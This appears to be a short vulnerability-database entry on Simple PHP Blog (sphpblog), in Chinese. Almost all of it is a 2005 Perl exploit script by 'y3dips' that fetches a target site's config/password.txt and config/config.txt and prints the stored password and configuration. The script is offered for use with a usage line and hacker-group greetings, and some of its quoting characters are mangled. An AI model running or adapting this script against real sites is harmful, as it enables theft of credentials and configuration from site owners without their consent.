sphpblog多个输入验证漏洞

#!/usr/bin/perl -w # Remote grabbing sphpblog password & config file by y3dips # Bug find by y3dips ＜http:// y3dips echo or id＞ # Bug published at http://echo.or.id/adv/adv12-y3dips-2005.txt print ` * Remote grabbing sphpblog password & config file by y3dips * `; require LWP::UserAgent; if(@ARGV == 1) { $target= $ARGV[0]; my $ua = LWP::UserAgent-＞new; $ua-＞agent(`MSIE/6.0 Windows`); $ua-＞timeout(10); $ua-＞env_proxy; my @url = (`http://$target/config/password.txt`, ` http://$target/config/config.txt`); foreach my $urlz (@url) { my $injek = $ua-＞get($urlz); print ` ------------------------------- `; if ($injek-＞is_success) { print $injek-＞content;} else {die $injek-＞status_line;} print ` ------------------------------- `; } } else { print `Use: perl $0 [www.target.com] `; } # EOF y3dips(c)2005 # greetz : # @echo|staff = qw/ m0by the_day z3r0byt3 comex k-159 c-a-s-e s`to lirva32 anonymous /; # @waraxe.us = qw/ waraxe LINUX shai-tan all_guys /; # @echo = qw/ newbie_hacker@yahoogroups.com #e-c-h-o_@_DALnet /;